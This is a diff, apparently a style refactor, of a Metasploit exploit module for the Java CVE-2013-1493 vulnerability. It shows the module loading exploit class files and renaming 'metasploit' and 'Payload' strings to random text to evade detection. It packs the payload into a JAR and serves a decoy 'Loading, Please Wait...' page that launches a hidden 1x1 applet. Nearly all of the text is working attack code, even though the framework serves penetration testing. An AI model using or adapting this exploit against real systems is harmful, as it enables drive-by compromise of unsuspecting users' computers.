@@ -38,7 +38,6 @@ class MetasploitModule < Msf::Exploit::Remote
           [ 'URL', 'http://www.oracle.com/technetwork/topics/security/alert-cve-2013-1493-1915081.html' ],
           [ 'URL', 'http://web.archive.org/web/20161013042610/http://pastie.org/pastes/6581034' ]
         ],
-        'Platform' => %w{java win},
         'Payload' => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
         'Targets' => [
           [
@@ -68,17 +67,17 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def setup
-    path = File.join(Msf::Config.data_directory, "exploits", "cve-2013-1493", "Init.class")
-    @init_class = File.open(path, "rb") { |fd| fd.read(fd.stat.size) }
-    path = File.join(Msf::Config.data_directory, "exploits", "cve-2013-1493", "Leak.class")
-    @leak_class = File.open(path, "rb") { |fd| fd.read(fd.stat.size) }
-    path = File.join(Msf::Config.data_directory, "exploits", "cve-2013-1493", "MyBufferedImage.class")
-    @buffered_image_class = File.open(path, "rb") { |fd| fd.read(fd.stat.size) }
-    path = File.join(Msf::Config.data_directory, "exploits", "cve-2013-1493", "MyColorSpace.class")
-    @color_space_class = File.open(path, "rb") { |fd| fd.read(fd.stat.size) }
+    path = File.join(Msf::Config.data_directory, 'exploits', 'cve-2013-1493', 'Init.class')
+    @init_class = File.open(path, 'rb') { |fd| fd.read(fd.stat.size) }
+    path = File.join(Msf::Config.data_directory, 'exploits', 'cve-2013-1493', 'Leak.class')
+    @leak_class = File.open(path, 'rb') { |fd| fd.read(fd.stat.size) }
+    path = File.join(Msf::Config.data_directory, 'exploits', 'cve-2013-1493', 'MyBufferedImage.class')
+    @buffered_image_class = File.open(path, 'rb') { |fd| fd.read(fd.stat.size) }
+    path = File.join(Msf::Config.data_directory, 'exploits', 'cve-2013-1493', 'MyColorSpace.class')
+    @color_space_class = File.open(path, 'rb') { |fd| fd.read(fd.stat.size) }
 
-    @init_class_name = rand_text_alpha("Init".length)
-    @init_class.gsub!("Init", @init_class_name)
+    @init_class_name = rand_text_alpha('Init'.length)
+    @init_class.gsub!('Init', @init_class_name)
     super
   end
 
@@ -89,38 +88,38 @@ class MetasploitModule < Msf::Exploit::Remote
     when /\.jar$/i
       jar = payload.encoded_jar
       jar.add_file("#{@init_class_name}.class", @init_class)
-      jar.add_file("Leak.class", @leak_class)
-      jar.add_file("MyBufferedImage.class", @buffered_image_class)
-      jar.add_file("MyColorSpace.class", @color_space_class)
-      metasploit_str = rand_text_alpha("metasploit".length)
-      payload_str = rand_text_alpha("payload".length)
-      jar.entries.each { |entry|
-        entry.name.gsub!("metasploit", metasploit_str)
-        entry.name.gsub!("Payload", payload_str)
-        entry.data = entry.data.gsub("metasploit", metasploit_str)
-        entry.data = entry.data.gsub("Payload", payload_str)
-      }
+      jar.add_file('Leak.class', @leak_class)
+      jar.add_file('MyBufferedImage.class', @buffered_image_class)
+      jar.add_file('MyColorSpace.class', @color_space_class)
+      metasploit_str = rand_text_alpha('metasploit'.length)
+      payload_str = rand_text_alpha('payload'.length)
+      jar.entries.each do |entry|
+        entry.name.gsub!('metasploit', metasploit_str)
+        entry.name.gsub!('Payload', payload_str)
+        entry.data = entry.data.gsub('metasploit', metasploit_str)
+        entry.data = entry.data.gsub('Payload', payload_str)
+      end
       jar.build_manifest
 
-      send_response(cli, jar, { 'Content-Type' => "application/octet-stream" })
-    when /\/$/
+      send_response(cli, jar, { 'Content-Type' => 'application/octet-stream' })
+    when %r{/$}
       payload = regenerate_payload(cli)
-      if not payload
-        print_error("Failed to generate the payload.")
+      if !payload
+        print_error('Failed to generate the payload.')
         send_not_found(cli)
         return
       end
       send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' })
     else
-      send_redirect(cli, get_resource() + '/', '')
+      send_redirect(cli, get_resource + '/', '')
     end
   end
 
   def generate_html
-    html = %Q|<html><head><title>Loading, Please Wait...</title></head>|
-    html += %Q|<body><center><p>Loading, Please Wait...</p></center>|
-    html += %Q|<applet archive="#{rand_text_alpha(8)}.jar" code="#{@init_class_name}.class" width="1" height="1">|
-    html += %Q|</applet></body></html>|
+    html = %(<html><head><title>Loading, Please Wait...</title></head>)
+    html += %(<body><center><p>Loading, Please Wait...</p></center>)
+    html += %(<applet archive="#{rand_text_alpha(8)}.jar" code="#{@init_class_name}.class" width="1" height="1">)
+    html += %(</applet></body></html>)
     return html
   end
 end
